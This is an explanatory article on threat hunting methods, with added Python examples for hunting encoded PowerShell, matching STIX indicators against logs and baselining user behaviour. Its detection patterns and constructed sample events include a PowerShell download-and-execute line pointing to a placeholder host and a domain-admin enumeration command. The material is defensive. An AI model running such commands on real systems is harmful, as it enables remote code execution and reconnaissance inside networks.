Threat hunting is a proactive process for locating cyber attackers in computing environments. It typically involves human threat hunters and automated threat hunting processes. Threat hunters start from the assumption that attackers have already breached your defenses and are active inside the network.
Threat hunting does not typically involve responding directly to threats. Rather, threat hunters collect information on ongoing attacks and attempt to track down the attackers and notify the incident response team of the incident. Threat hunters may assist these response efforts or only provide information.
An important role of threat hunting is to help detect advanced persistent threats (APTs)—long-term attacks that enable actors to hide undetected. Due to the sophistication of APT attackers, they can often remain hidden from traditional security defenses. Actors launch APT attacks to achieve specific objectives, such as data exfiltration at a large scale, obtaining credentials for lateral movement, and obtaining confidential information.
How Threat Hunting Works
The success of threat hunting programs is based on the availability of rich data from the IT environment. Organizations must first deploy enterprise security systems to collect data. This information can be explored by threat hunters and can provide valuable clues about the presence of attackers.
Cyber threat hunters introduce a human factor into corporate security to complement automated systems. They can detect and investigate threats, and escalate them for containment, before they become serious problems. A threat hunter could be a security analyst within the company's IT department but could also be an external analyst.
There are several threat hunting methodologies, but all of them look for the unknown in the environment. They go beyond traditional detection technologies based on alerts from a Security Information and Event Management (SIEM). Threat hunters examine security data in depth, searching for hidden malware, suspicious patterns of activity, and vulnerabilities that have not been identified by regular scanning. Once they identify a threat, they can help remediate security weaknesses to prevent threats from recurring.
Types of Threat Hunting
The threat hunting process begins with a hypothesis based on a trigger or security data. This hypothesis guides an in-depth investigation of possible risks using structured, unstructured, intel-based, or hybrid (situational) hunting.
Structured hunting involves using an attacker’s tactics, techniques, and procedures (TTPs) and indicators of attack (IoAs) to hunt for a threat. It aligns the hunt around specific TTPs associated with a threat actor, typically using the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK) framework; the former PRE-ATT&CK matrix, which covered pre-compromise activity such as reconnaissance, has since been folded into the Enterprise matrix. The goal is to ensure hunters can identify the threat even before the attacker causes any damage.
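As an added example (not code from the original article), here is a structured hunt in Python for one ATT&CK technique: PowerShell launched with a Base64-encoded command (T1059.001, with T1027 for the encoding). The process-creation events, host names and the URL in the decoded script are constructed for illustration, and the list of suspicious script features is a starting point an analyst would extend, not an exhaustive signature set.

```python
import base64
import re

# Structured hunt hypothesis: an adversary launches Base64-encoded PowerShell
# (ATT&CK T1059.001 PowerShell, combined with T1027 Obfuscated Files or
# Information) so that command-line logging shows a blob instead of a script.
# The hunt decodes every -EncodedCommand payload and examines the decoded
# script, rather than looking for a signature of the encoded blob itself.

# Decoded-script features that warrant analyst attention: (label, regex).
SUSPICIOUS_PATTERNS = [
    ("download-cradle", r"downloadstring|downloadfile|invoke-webrequest|net\.webclient"),
    ("invoke-expression", r"\biex\b|invoke-expression"),
    ("nested-base64", r"frombase64string"),
    ("amsi-tamper", r"amsiutils|amsiinitfailed"),
]

def _is_encoded_flag(token):
    """True for any PowerShell abbreviation of -EncodedCommand (-e, -ec, -enc, ...)."""
    if not token.startswith("-") or len(token) < 2:
        return False
    return "encodedcommand".startswith(token[1:].lower())

def decode_encoded_command(command_line):
    """Return the script carried by -EncodedCommand, or None if there is none
    or the payload is not valid Base64-wrapped UTF-16LE."""
    tokens = command_line.split()
    for flag, payload in zip(tokens, tokens[1:]):
        if _is_encoded_flag(flag):
            try:
                return base64.b64decode(payload, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
                return None
    return None

def hunt_encoded_powershell(events):
    """events: iterable of (host, parent_image, command_line).  Returns one
    finding per encoded PowerShell launch, with the decoded script and the
    labels of the suspicious patterns that matched it."""
    findings = []
    for host, parent, cmdline in events:
        parts = cmdline.split()
        if not parts:
            continue
        image = parts[0].lower().rsplit("\\", 1)[-1]
        if image not in ("powershell.exe", "pwsh.exe"):
            continue
        script = decode_encoded_command(cmdline)
        if script is None:
            continue
        hits = [label for label, pat in SUSPICIOUS_PATTERNS if re.search(pat, script, re.I)]
        findings.append({"host": host, "parent": parent, "script": script, "indicators": hits})
    return findings

def _encode(script):
    """Build an -EncodedCommand payload the way PowerShell expects it (UTF-16LE, then Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed process-creation events (not real telemetry): (host, parent image, command line).
SAMPLE_EVENTS = [
    ("ws01", "explorer.exe", "powershell.exe -NoProfile -Command Get-Process"),
    ("ws02", "winword.exe", "powershell.exe -nop -w hidden -enc "
     + _encode('IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a.ps1")')),
    ("srv01", "services.exe", "svchost.exe -k netsvcs"),
    ("ws03", "cmd.exe", "powershell.exe -EncodedCommand " + _encode("Get-ChildItem C:\\Users")),
    ("ws04", "explorer.exe", "powershell.exe -ExecutionPolicy Bypass -File C:\\tools\\build.ps1"),
]

if __name__ == "__main__":
    for f in hunt_encoded_powershell(SAMPLE_EVENTS):
        print(f"{f['host']} parent={f['parent']} indicators={f['indicators'] or 'none'}")
        print("   " + f["script"])
```

The decoded script, not the encoded blob, is what gets scored, and the parent image is carried through so the analyst can weigh an encoded launch from an Office process (ws02) differently from a plain directory listing started from a shell (ws03). Both are reported; the hunt's job is to surface and triage, not to decide alone.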
Unstructured hunting involves using a trigger, which may be one of many indicators of compromise (IoCs), to launch an investigation. The trigger typically suggests that hunters should look for patterns both before and after the detection. The goal is to let hunters look back as far as data retention allows, including previously associated offenses.
Intel-based hunting involves using IoCs from threat intelligence sources as inputs to initiate reactive hunting. The hunt follows predefined rules established by the threat intelligence feed and the security information and event management (SIEM) system.
Intel-based hunting may use various input types provided by intelligence sources such as computer emergency response teams (CERTs), including file hashes, domain names, IP addresses and network ranges, and host artifacts such as file paths and registry keys.
Most sources let you export indicators in Structured Threat Information eXpression (STIX) format and pull them automatically over Trusted Automated eXchange of Intelligence Information (TAXII) into your SIEM. When an indicator matches, the threat hunter investigates activity that occurred before and after the match to locate further indicators of compromise.
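The following Python example is added here and is not from the original article. It demonstrates the intel-based hunt just described and the before-and-after pivot from the unstructured-hunting paragraph: STIX-style indicators (a domain, an IP and a file hash) are matched against normalised log records, and every match is expanded to what the same host did around it. The indicator objects, the log records, the host names and the log schema (the TYPE_TO_FIELD mapping) are all constructed for this example; the IP addresses are documentation ranges and the hash is made up. Only single-comparison STIX patterns are parsed, which is the common shape of IoC feeds; compound patterns are out of scope.

```python
import re
from datetime import datetime, timedelta

# Constructed STIX 2.1-style indicator objects, trimmed to the fields this
# example uses, as a TAXII collection would deliver them.  The values are
# documentation ranges and a made-up hash, not real infrastructure.
INDICATORS = [
    {"id": "indicator--c2-domain", "pattern": "[domain-name:value = 'update.example.invalid']"},
    {"id": "indicator--c2-ip", "pattern": "[ipv4-addr:value = '203.0.113.7']"},
    {"id": "indicator--dropper", "pattern": "[file:hashes.'SHA-256' = '" + "deadbeef" * 8 + "']"},
]

# Where each STIX observable appears in this example's (constructed) log schema.
TYPE_TO_FIELD = {
    ("domain-name", "value"): "dns_query",
    ("ipv4-addr", "value"): "dest_ip",
    ("file", "hashes.'SHA-256'"): "sha256",
}

# Matches a single-comparison pattern such as [ipv4-addr:value = '203.0.113.7'].
SIMPLE_PATTERN = re.compile(r"^\[([a-z0-9-]+):([A-Za-z0-9_.'\-\[\]]+)\s*=\s*'([^']*)'\]$")

def parse_simple_pattern(pattern):
    """Return (object_type, property, value) for a single-comparison STIX pattern.
    Compound patterns (AND/OR, FOLLOWEDBY, WITHIN) are deliberately unsupported."""
    m = SIMPLE_PATTERN.match(pattern.strip())
    if not m:
        raise ValueError("unsupported pattern: " + pattern)
    return m.groups()

def match_indicators(logs, indicators):
    """Return a list of (indicator_id, record) for every log record carrying an IoC value."""
    hits = []
    for ind in indicators:
        obj_type, prop, value = parse_simple_pattern(ind["pattern"])
        field = TYPE_TO_FIELD.get((obj_type, prop))
        if field is None:
            continue  # no telemetry for this observable type; nothing to hunt in
        for rec in logs:
            if str(rec.get(field, "")).lower() == value.lower():
                hits.append((ind["id"], rec))
    return hits

def pivot(logs, hit, before=timedelta(minutes=5), after=timedelta(minutes=30)):
    """Everything the same host did shortly before and after the match: the
    'what happened around the alert' step of an intel-based hunt."""
    t0 = datetime.fromisoformat(hit["ts"])
    window = [r for r in logs
              if r["host"] == hit["host"]
              and t0 - before <= datetime.fromisoformat(r["ts"]) <= t0 + after]
    return sorted(window, key=lambda r: r["ts"])

def intel_hunt(logs, indicators):
    """One finding per IoC match, each carrying the surrounding host activity."""
    return [{"indicator": ind_id, "hit": rec, "context": pivot(logs, rec)}
            for ind_id, rec in match_indicators(logs, indicators)]

# Constructed log records from several sources, normalised to one schema.
LOGS = [
    {"ts": "2024-05-02T09:55:01", "host": "ws02", "src": "edr", "event": "process", "image": "winword.exe"},
    {"ts": "2024-05-02T09:56:30", "host": "ws02", "src": "edr", "event": "file_write",
     "sha256": "deadbeef" * 8, "path": "C:\\Users\\j\\AppData\\Local\\Temp\\inv.exe"},
    {"ts": "2024-05-02T09:57:12", "host": "ws02", "src": "dns", "event": "query", "dns_query": "update.example.invalid"},
    {"ts": "2024-05-02T09:57:13", "host": "ws02", "src": "fw", "event": "conn", "dest_ip": "203.0.113.7", "dest_port": 443},
    {"ts": "2024-05-02T09:57:40", "host": "ws07", "src": "dns", "event": "query", "dns_query": "www.example.com"},
    {"ts": "2024-05-02T10:20:00", "host": "ws02", "src": "edr", "event": "process", "image": "net.exe",
     "cmd": 'net group "Domain Admins" /domain'},
    {"ts": "2024-05-02T12:00:00", "host": "srv01", "src": "fw", "event": "conn", "dest_ip": "198.51.100.4", "dest_port": 443},
]

if __name__ == "__main__":
    for f in intel_hunt(LOGS, INDICATORS):
        print(f"{f['indicator']} matched on {f['hit']['host']} at {f['hit']['ts']}")
        for r in f["context"]:
            print("   ", r["ts"], r["src"], r["event"])
```

The pivot is what turns an IoC match into a hunt: the DNS hit on its own is one line, but the window around it shows the Office process that preceded it, the file that was written, the outbound connection that followed, and a domain-group enumeration twenty minutes later. An indicator type for which you hold no telemetry is skipped rather than silently reported as "no match", which is the honest answer when the data does not exist.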
Hybrid threat hunting involves combining structured, unstructured, and intel-based hunting together to enable you to customize the hunt. It typically employs industry-based hunting alongside situational awareness and specified hunting requirements. You can customize the hunt using data about geopolitical issues, for example, and use a hypothesis as the trigger.
Threat Hunting vs. DFIR
Digital forensics and incident response (DFIR) is a field focused on the identification, remediation, and investigation of cybersecurity incidents. Digital forensics involves collecting, preserving, and analyzing forensic evidence to obtain a complete and detailed understanding of an event. Incident response, on the other hand, aims to detect, contain, and eradicate an attack.
The combination of digital forensics and incident response can help keep a business running while identifying and resolving security breaches. It provides critical evidence that the organization can use to prosecute criminals or to support cyber insurance claims.
Threat hunting and DFIR are two distinct approaches at opposite ends of the cyber attack timeline. Threat hunting is a proactive technique used to identify new or currently active threats. When done right, it enables early detection of threats and preventive, remedial action. Digital forensics, on the other hand, is critical to shaping post-incident responses, limiting damage, initiating corrective actions, and improving future responses. Both are therefore essential components of an organization's security lifecycle.
Best Practices for Threat Hunting
Here are some best practices to help you implement more effective threat hunting.
Keep Your Internal Systems Transparent
Threat hunters must understand the environment they’re protecting to detect anomalies. They require visibility over your architecture, traffic, and user privileges, allowing them to establish a baseline of normal behavior against which they can compare unusual actions. Many suspicious actions require context to identify.
Transparency also requires accessing system data, typically as logs. Collect logs using existing security tools and centralize them for simpler analysis.
Ensure Threat Intelligence Is Up-to-Date
Having up-to-date tools and processes is essential for identifying advanced attackers who can slip past your security apparatus. You cannot rely on outdated threat data, especially since you have probably acted on it already and your defenses are likely already tuned to those older threats.
Threat hunting should focus on new or unknown attacks, such as zero-day exploits (attacks on vulnerabilities for which no patch is yet available). You should follow vulnerability reports to keep track of newly discovered threats.
Leverage AI and UEBA
User and Entity Behavior Analytics (UEBA) is a security analytics capability that uses statistical and machine-learning models to identify suspicious behavior across your network. However, you must have mature logging and incident response policies to leverage UEBA and other AI tools effectively. The models must have a baseline of normal behavior against which to analyze network activity.
Before using UEBA, you must collect sufficient data to define the normal activity and strike a balance between slightly unusual and outright suspicious behavior. You also need to avoid generating too many false positives.
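To make the baseline idea from this section and from "Keep Your Internal Systems Transparent" concrete, here is an added Python example (not code from the original article or any UEBA product) of the simplest form of entity behavior scoring: a per-user baseline of how many distinct hosts the user authenticates to per day, a z-score for today's count, and a backtest that reports how many baseline days would have alerted at a given threshold, which is the false-positive load you are choosing to accept. The user names, daily counts, minimum-baseline length and thresholds are all constructed or chosen for illustration.

```python
import statistics

# Constructed baseline: distinct hosts each user authenticated to per day over
# a 14-day learning window (sample data, not real telemetry).
BASELINE = {
    "alice": [1, 1, 2, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 2],   # ordinary user, one or two hosts
    "bob":   [3, 4, 3, 5, 4, 3, 4, 4, 3, 5, 4, 3, 4, 4],   # helpdesk, touches many hosts every day
    "carol": [1, 1],                                        # new starter, too little history
}

MIN_BASELINE_DAYS = 7   # below this the model has no right to an opinion
MIN_STDEV = 0.25        # floor so a perfectly regular user does not divide by zero
UNUSUAL_Z = 2.0         # worth a look
SUSPICIOUS_Z = 4.0      # escalate

def build_profile(days):
    """Per-entity baseline, or None when the learning window is too short."""
    if len(days) < MIN_BASELINE_DAYS:
        return None
    return {"n": len(days),
            "mean": statistics.fmean(days),
            "stdev": max(statistics.stdev(days), MIN_STDEV)}

def score(user, hosts_today, baseline=BASELINE):
    """Classify today's count against the user's own history.  Only upward
    deviations matter here: the hypothesis is lateral movement, so logging
    on to fewer hosts than usual is not interesting."""
    profile = build_profile(baseline.get(user, []))
    if profile is None:
        return {"user": user, "verdict": "insufficient_baseline", "z": None}
    z = (hosts_today - profile["mean"]) / profile["stdev"]
    if z >= SUSPICIOUS_Z:
        verdict = "suspicious"
    elif z >= UNUSUAL_Z:
        verdict = "unusual"
    else:
        verdict = "normal"
    return {"user": user, "verdict": verdict, "z": round(z, 2)}

def backtest(threshold, baseline=BASELINE):
    """Fraction of baseline days that would have alerted at `threshold`: an
    estimate of the false-positive rate analysts would have to absorb."""
    alerts = total = 0
    for days in baseline.values():
        profile = build_profile(days)
        if profile is None:
            continue
        for x in days:
            total += 1
            if (x - profile["mean"]) / profile["stdev"] >= threshold:
                alerts += 1
    return alerts / total if total else 0.0

if __name__ == "__main__":
    for user, today in [("alice", 9), ("alice", 2), ("bob", 6), ("bob", 9), ("carol", 5)]:
        print(user, today, score(user, today))
    for t in (1.0, 2.0, 4.0):
        print(f"threshold z>={t}: {backtest(t):.1%} of baseline days would alert")
```

Two details carry the section's point. First, the same absolute count means different things for different entities: nine hosts is wildly abnormal for alice and merely elevated for bob, which is why a single global threshold on "hosts per day" would miss one and drown the other. Second, the backtest shows the cost of a tighter threshold in hours of analyst time before you turn it on: at z of 1.0 roughly one baseline day in five would have fired on ordinary fluctuation, at 2.0 none would.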
Threat hunting can help your organization transition from a passive information security model, in which the organization only reacts when an attack occurs, to a proactive model in which defenders actively seek attackers lurking in the network or open doors that could allow attackers to enter.
I provided several best practices that can help you get started with threat hunting and practice it more effectively:
- Keep systems transparent—threat hunters must have a clear view of the internal network and understand the business relevance of critical systems.
- Ensure threat intelligence is up to date—threat hunters should not look for yesterday’s threats. They should leverage the latest threat intelligence information to seek out emerging and unknown threats.
- Leverage AI and UEBA—threat hunting requires complex data analysis, which can be augmented by the AI and behavioral analytics capabilities offered by modern security analytics tools.
I hope this will be useful as you explore the use of threat hunting to make the move to proactive security.